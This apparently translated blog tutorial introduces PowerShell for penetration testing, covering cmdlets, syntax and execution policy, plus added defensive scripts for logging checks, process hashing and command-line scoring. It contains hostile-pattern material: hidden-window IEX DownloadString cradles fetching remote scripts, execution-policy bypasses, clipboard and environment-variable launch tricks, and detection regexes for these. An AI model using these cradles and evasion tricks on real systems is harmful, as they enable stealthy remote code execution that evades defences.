Powershell penetration framework


Powershell basics

Introduction to Powershell

What is Windows PowerShell

Windows PowerShell is a task-based automation command-line shell and related scripting language created by Microsoft, based on the .NET framework.

It is Microsoft's newer shell, combining the functionality of the old Command Prompt (CMD) with a new set of scripting instructions and built-in system management capabilities.

It is used to control and automate the management of the Windows operating system and the applications running on the operating system.

It is also widely used in penetration testing and related work: it can execute commands in memory without writing to disk, which can help evade anti-virus detection.

Commands in Windows PowerShell are called cmdlets, pronounced "command-lets," where each cmdlet represents a specific function or task-based script.

PowerShell is installed by default on Windows 7 and later systems.

It is trusted by the operating system.

It provides access to almost everything in the Windows operating system.

It comes with the Windows PowerShell Integrated Scripting Environment (ISE).

Why Use Windows PowerShell

It is both a scripting language and a command-line shell, and it can interact with a wide range of technologies.

Windows PowerShell allows full access to all types in the .NET Framework. PowerShell is object-based.

Many of the GUIs Microsoft designs for its products are front ends to PowerShell.

It is safer than running VBScript or other scripting languages.

By combining multiple commands and writing scripts, it can perform repetitive tasks more efficiently. Suppose a system administrator wishes to create hundreds of Active Directory users; they can do so with just a few PowerShell cmdlets placed in a script.

Many complex and time-consuming configurations and tasks can be done in a second using simple cmdlets of PowerShell.

How to start Windows PowerShell

PowerShell is available in all recent versions of Windows.

To launch PowerShell, follow these steps: search for Windows PowerShell, select it and click. A PowerShell window will open.

Difference Between PowerShell and Cmd Command Prompt

PowerShell

1. It is a task-based automation command-line interface and associated scripting language built on the .NET framework.
2. It can interpret both batch and PowerShell commands.
3. It is used to control and automate applications on Windows servers and the Windows operating system itself.
4. The output PowerShell generates is not just a stream of characters but a collection of objects.
5. It is both a shell and a scripting environment, and it supports writing large script files for managing the Windows operating system.

cmd

1. It is the default command-line interpreter of the Microsoft Windows operating system.
2. It can only interpret batch commands.
3. It is used to execute the given commands on the console and can be used to debug problems.
4. The output the command prompt generates is just a stream of characters (text).
5. It is only a shell; it lets users run only simple, basic scripts in the form of batch files.

Running PowerShell as administrator

In the Windows operating system, there are five ways to run PowerShell as an administrator:

1. Using the Run window (for all versions of Windows), run PowerShell as an administrator.
2. Use the Cortana search bar (for Windows 10) to run PowerShell as an administrator.
3. Run PowerShell as an administrator at the command prompt.
4. Run PowerShell as administrator from Task Manager.
5. Run PowerShell as an administrator from the Start menu.

Windows PowerShell ISE

Microsoft Windows PowerShell ISE is a graphical application and the default editor for Windows PowerShell.

ISE stands for Integrated Scripting Environment. It is an interface where we can run commands as well as write, test and debug PowerShell scripts without writing all the commands in the command line interface.

The Integrated Scripting Environment (ISE) provides tab completion, multi-line editing, syntax coloring, context-sensitive help, selective execution, and support for right-to-left languages.

The PowerShell ISE window contains the following three panes:

Scripts pane: This pane allows users to create and run scripts. Users can easily open, edit and run existing scripts in the script pane.

Output pane: This pane displays the output of the scripts and commands that were run. You can also clear and copy the contents of the Output pane.

Command pane: This pane allows the user to write commands. Single-line or multi-line commands can easily be executed in the command pane.

Creating and running scripts

Creating a script with a text editor

Open any text editor and write the content of the test script:

echo "Hello world"

Save the file as test.ps1 and double-click to run it!

Creating a script with the Integrated Scripting Environment

Open Windows PowerShell ISE, create a new empty file, write the content of the script to be executed, and save the file as test.ps1.

Click Run on the menu bar, or press the F5 shortcut key, to run the script.

Load and execute a local script

powershell -f test.ps1  # the path must be specified

Load and execute a remote script

PowerShell downloads the script code remotely and executes it:

powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://192.168.88.128:80/test.ps1')"

Invoke-Expression (alias IEX): executes a string as a command.

WindowStyle Hidden (-w Hidden): hides the window.

NonInteractive (-NonI): non-interactive mode; PowerShell does not present an interactive prompt to the user.

NoProfile (-NoP): the PowerShell console does not load the current user's profile.

NoExit (-NoE): does not exit the shell after execution.

EncodedCommand (-enc): accepts a Base64-encoded command string, avoiding some parsing problems.

WebClient class: Provides common methods for sending data to and receiving data from a resource identified by a URI.

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient?view=net-6.0

DownloadString method: Downloads the requested resource as a String. The resource to download can be specified as a String containing a URI or as a Uri.

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient.downloadstring?view=net-6.0

Script Execution Policy

When launching PowerShell in a computer system, the default execution policy does not allow us to execute or run scripts.

View the current execution policy

Get-ExecutionPolicy

Get all execution policies affecting the current session and display them in order of preference

Get-ExecutionPolicy -List

Set the execution policy to Bypass

Set-ExecutionPolicy Bypass

# PowerShell must be started with administrator privileges

Set the execution policy for a specific scope

Set-ExecutionPolicy Unrestricted -Scope LocalMachine

View in detail: https://learn.microsoft.com/zh-cn/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

The following execution policies can be set in PowerShell:

Name: Description
AllSigned: Only digitally signed scripts are allowed to run.
Bypass: Nothing is blocked, and there are no warnings or prompts.
Default: Sets the default execution policy: Restricted on Windows clients, RemoteSigned on Windows servers.
RemoteSigned: Scripts downloaded from the network must carry a digital signature to run; scripts created locally do not need a signature and can be run directly.
Restricted: Individual commands can be run, but scripts cannot; running a script reports an error. This is the default policy on Windows 8, Windows 8.1 and Windows Server 2012.
Undefined: No execution policy is set in this scope; the inherited or default policy applies.
Unrestricted: Unsigned scripts are allowed to run. Scripts downloaded from the Internet produce a security prompt before running, and you must confirm whether to execute the script.

Bypass is the most commonly used.

Bypassing the execution policy

Read the script locally and run it through the pipe character

powershell Get-Content C:\Users\xxxxx\Desktop\powershell\test.ps1 | powershell -

Download and run the script remotely through IEX

powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('http://192.168.88.128:80/test.ps1')"

Bypass execution policy

powershell -executionpolicy bypass -f C:\Users\xxx\Desktop\powershell\test.ps1

Unrestricted execution policy

powershell -executionpolicy unrestricted -f C:\Users\xxxx\Desktop\powershell\test.ps1
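The commands above show that the execution policy is a convenience setting, not a security boundary. The following added example (not from the original post) reports the policy in every scope and then checks whether PowerShell script block logging and module logging are enabled, since those logs, not the execution policy, are what records script content when one of the bypasses above is used. The registry paths and value names are the ones Group Policy writes for "Turn on PowerShell Script Block Logging" and "Turn on Module Logging"; the function names and the warning threshold are assumptions.

```powershell
# Added example, not from the original post. Assumes Windows PowerShell 5.1
# or later and read access to HKLM; no settings are changed.

function Get-ExecutionPolicyReport {
    # One entry per scope, in the order PowerShell evaluates them,
    # plus the effective policy that results from that precedence
    $scopes    = Get-ExecutionPolicy -List
    $effective = Get-ExecutionPolicy
    [pscustomobject]@{
        Effective = $effective
        Scopes    = ($scopes | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join ', '
    }
}

function Test-PowerShellLogging {
    # Policy keys written by the Group Policy logging settings; absent key
    # or value means the setting is not configured (logging off)
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $sbl  = Get-ItemProperty -Path "$base\ScriptBlockLogging" -ErrorAction SilentlyContinue
    $mod  = Get-ItemProperty -Path "$base\ModuleLogging"      -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ScriptBlockLogging = [bool]($sbl -and $sbl.EnableScriptBlockLogging -eq 1)
        ModuleLogging      = [bool]($mod -and $mod.EnableModuleLogging -eq 1)
    }
}

$policy  = Get-ExecutionPolicyReport
$logging = Test-PowerShellLogging
$policy
$logging

# A permissive effective policy without script block logging means script
# bodies never reach event 4104 in Microsoft-Windows-PowerShell/Operational
if ($policy.Effective -in 'Bypass','Unrestricted' -and -not $logging.ScriptBlockLogging) {
    Write-Warning "Effective policy is $($policy.Effective) and script block logging is off: script content will not be recorded."
}
```

Run it in an elevated or non-elevated session alike; it only reads. The Scopes string makes the precedence visible, so a MachinePolicy or UserPolicy entry that overrides a local Set-ExecutionPolicy is immediately apparent.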

PowerShell Comments

Single-line comments

Single-line comments are comments that start with the pound sign # at the beginning of the line. Everything to the right of the # sign is ignored. If you write multiple comment lines in a script, each line must begin with the # symbol.

# single-line comment.............

Multi-line comments

To comment multiple lines, place the <# symbol at the beginning of the first line and the #> symbol at the end of the last line.

<# multi-line comment.........
multi-line comment.........
multi-line comment....................#>

PowerShell Cmdlet

Cmdlets are a very important set of PowerShell's built-in commands.

Cmdlets, pronounced "command-lets", are lightweight commands used in the PowerShell environment. They are special commands that perform specific functions within the PowerShell environment.

Cmdlets follow the verb-noun pattern, for example: set-childItem

Cmdlets are commands that exist as instances of .NET classes. Cmdlets can be written in any .NET language, or in the PowerShell scripting language.

A cmdlet is not a simple executable: it has many parameters, which are used to specify input or to manage redirection through pipes. We can display the available cmdlets by typing Get-Command.

Get-Command -CommandType Cmdlet

Common Cmdlet commands

View the PowerShell version

$PSVersionTable

# alias: Get-Host

View current environment variables

Get-ChildItem env:

# aliases: gci, ls, dir

Start the specified program

Start-Process calc.exe

saps explorer.exe

# aliases: saps, start

Get the specified process information

Get-Process
Get-Process explorer

# aliases: gps, ps

Get file information

Get-Item 1.txt

# alias: gi

Copy files

Copy-Item 1.txt 2.txt

# aliases: cpi, cp, copy

Move files

Move-Item 1.txt 2.txt

# aliases: mi, mv, move

Get specified service information

Get-Service -Name Everything

Get file hash

Get-FileHash -Algorithm SHA1 1.txt
Get-FileHash -Algorithm MD5 1.txt

Set text content

Set-Content 1.txt -Value "hello, word"

# alias: sc

Delete the contents of a file without deleting the file

Clear-Content 1.txt

Get the current directory

Get-Location

# aliases: gl, pwd

View aliases

Get-Alias -name dir
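As an added example that is not part of the original post, the following script combines several of the cmdlets above (Get-Process, Get-Item, Get-FileHash, Set-Content) into a small integrity inventory of the executables behind running processes, a typical first step when triaging a host. $OutFile and the path patterns treated as suspicious are assumptions; Get-AuthenticodeSignature is a standard cmdlet that is not listed above.

```powershell
# Added example, not from the original post. Assumes Windows PowerShell 5.1+.
$OutFile = "$env:TEMP\process-hashes.txt"   # assumed output location

function Get-ProcessHashInventory {
    param([string]$Algorithm = 'SHA256')
    # Get-Process exposes the executable path as .Path; protected system
    # processes (or ones we cannot open) return $null, so skip those.
    Get-Process |
        Where-Object { $_.Path } |
        Sort-Object Path -Unique |
        ForEach-Object {
            $file = Get-Item -LiteralPath $_.Path -ErrorAction SilentlyContinue
            if ($file) {
                $hash = Get-FileHash -LiteralPath $file.FullName -Algorithm $Algorithm
                [pscustomobject]@{
                    Name      = $_.ProcessName
                    Path      = $file.FullName
                    Algorithm = $hash.Algorithm
                    Hash      = $hash.Hash
                    # Authenticode status: Valid, NotSigned, HashMismatch, ...
                    Signed    = (Get-AuthenticodeSignature -LiteralPath $file.FullName).Status
                }
            }
        }
}

$inventory = Get-ProcessHashInventory

# Flag binaries that run from user-writable locations or lack a valid
# signature; the location list is an assumption, extend it to taste
$suspicious = $inventory | Where-Object {
    $_.Path -match '\\Users\\|\\Temp\\|\\AppData\\' -or $_.Signed -ne 'Valid'
}

$inventory | Format-Table Name, Signed, Hash -AutoSize

# One "hash  path" line per executable, in a form that can be diffed against
# a baseline taken from a known-good host
Set-Content -Path $OutFile -Value ($inventory | ForEach-Object { "$($_.Hash)  $($_.Path)" })
"Wrote $($inventory.Count) entries to $OutFile; $($suspicious.Count) flagged for review"
$suspicious | Format-Table Name, Signed, Path -AutoSize
```

Run the script twice, once on a known-good machine and once on the host under review, and compare the two output files; a hash that changed for the same path, or an unsigned binary under a user profile, is what deserves attention first.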

Basic syntax

Pipe character

|     # pass the output of one command as the input of another

Semicolon

;   # the semicolon runs commands one after another

Call operator

&   # the call operator lets you execute a command, script or function

Output single and double quotes

""""
# outputs a double quote
''''
# outputs a single quote

Redirection and comparison operators

>    # save output to the specified file (usage: Get-Process > output.txt)
>>   # append the script's output to the specified file (usage: test.ps1 >> output.txt)
2>   # write errors to the specified file (Get-Process none 2> Errors.txt)
2>>  # append errors to the specified file (Get-Process none 2>> logs-Errors.txt)
-eq  # equality operator (usage: $var1 -eq $var2, returns true or false)
-gt  # greater-than operator (usage: $var1 -gt $var2, returns true or false)
-match     # match operator; tests whether a pattern occurs in a string (usage: $Text -match $string, returns true or false)
-replace   # replace a string (usage: $Text -replace 'old','new'; returns the resulting string)
-in        # tests whether a value (string or number) appears in a list; the list can be written inline with ()

Variables

Variables start with $

$w = "hello world"   # variable assignment
$w   # access the variable

Arrays

$a = 'value1','value2','value3'     # create an array
$a[0]   # access the first element of the array
$a = @()   # empty array
$a = 1,'two',(get-date)   # arrays can mix types

Statements

Conditional statements

if ($var1 comparison_operator $var2) {
    What_To_Do
}
else {
    What_To_Do_If_Not
}

Loop statements

while (condition) {
}
Do {
} While (condition)
For (init; condition; step) {
}

Launching PowerShell from cmd

Normal method

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

Pipe input stream

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

Environment variable

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && cmd /c echo %cmd% | powershell -"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX ([Environment]::GetEnvironmentVariable('cmd','Process'));"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green&&powershell IEX ((Get-ChildItem env:cmd).Value)"

Execute from the clipboard

cmd.exe /c "echo Write-Host CLIP -Fore Green | clip && powershell [void] [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); IEX ([System.Windows.Forms.Clipboard]::GetText())"

Batch script execution

@echo off
powershell -c Write-Host SUCCESS -Fore Green
pause

# remove pause if you do not want "Press any key to continue..."
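The following added example (not from the original post) ties the basic syntax section (variables, arrays, -match, -in, if, foreach, for) to the launch techniques in this section from the defender's side: it scores command lines for the patterns shown above (IEX, DownloadString, -w hidden, -enc, execution-policy flags, clipboard and stdin execution). The sample lines, the indicator names, the weights and the thresholds are constructed; in practice the input would be process-creation events (Windows event 4688 or Sysmon event 1).

```powershell
# Added example, not from the original post: score command lines for the
# PowerShell launch patterns discussed above. Sample lines are constructed.
$samples = @(
    'cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"',
    'powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString(''http://192.168.88.128:80/test.ps1'')"',
    'powershell -executionpolicy bypass -f C:\Users\xxx\Desktop\powershell\test.ps1',
    'powershell -NoP -NonI -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',   # constructed; decodes to "IEX (New-Object"
    'cmd.exe /c "echo Write-Host CLIP -Fore Green | clip && powershell IEX ([System.Windows.Forms.Clipboard]::GetText())"',
    'cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"',
    'powershell Get-Process explorer'
)

# Indicator table: name, regex and weight. -match is case-insensitive by default.
$indicators = @(
    @{ Name = 'InvokeExpression'; Pattern = '\bIEX\b|Invoke-Expression';                      Weight = 2 },
    @{ Name = 'RemoteDownload';   Pattern = 'DownloadString|DownloadFile|Net\.WebClient';      Weight = 3 },
    @{ Name = 'HiddenWindow';     Pattern = '-w(indowstyle)?\s+hidden';                       Weight = 2 },
    @{ Name = 'EncodedCommand';   Pattern = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}';    Weight = 3 },
    @{ Name = 'PolicyBypass';     Pattern = '-ex(ecutionpolicy)?\s+(bypass|unrestricted)';    Weight = 1 },
    @{ Name = 'Clipboard';        Pattern = 'Clipboard\]::GetText';                            Weight = 2 },
    @{ Name = 'StdinPipe';        Pattern = '\|\s*powershell\s+(-(?=\s|"|$)|IEX\s+\$input)';  Weight = 2 }
)

function Get-CommandLineScore {
    param([string]$CommandLine)
    $score = 0
    $hits  = @()
    foreach ($i in $indicators) {
        if ($CommandLine -match $i.Pattern) {
            $score += $i.Weight
            $hits  += $i.Name
        }
    }
    # Thresholds are arbitrary; tune them against your own baseline
    $level = if ($score -ge 3) { 'HIGH' } elseif ($score -gt 0) { 'LOW' } else { 'clean' }
    [pscustomobject]@{ Level = $level; Score = $score; Hits = ($hits -join ','); CommandLine = $CommandLine }
}

$results = @()
for ($n = 0; $n -lt $samples.Count; $n++) {
    $results += Get-CommandLineScore -CommandLine $samples[$n]
    '[{0}] {1,-5} score={2} hits={3}' -f $n, $results[$n].Level, $results[$n].Score, $results[$n].Hits
}

# -in against an inline list, as described in the operator section
$flagged = $results | Where-Object { $_.Level -in 'HIGH','LOW' }
'{0} of {1} command lines flagged' -f $flagged.Count, $results.Count
```

With these samples the remote-download line scores 7 (IEX, download, hidden window), the clipboard line 4, the encoded line 3, and the stdin and bypass lines 2 and 1 respectively, while the two plain lines score 0. The weights matter less than the structure: each indicator is an independent regex, so adding a new launch pattern is one more table row rather than a change to the control flow.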

[To be continued, CobaltStrikePowerShell loader and PowerSploit post-infiltration framework will be updated later...]


Origin blog.csdn.net/weixin_44971640/article/details/128706455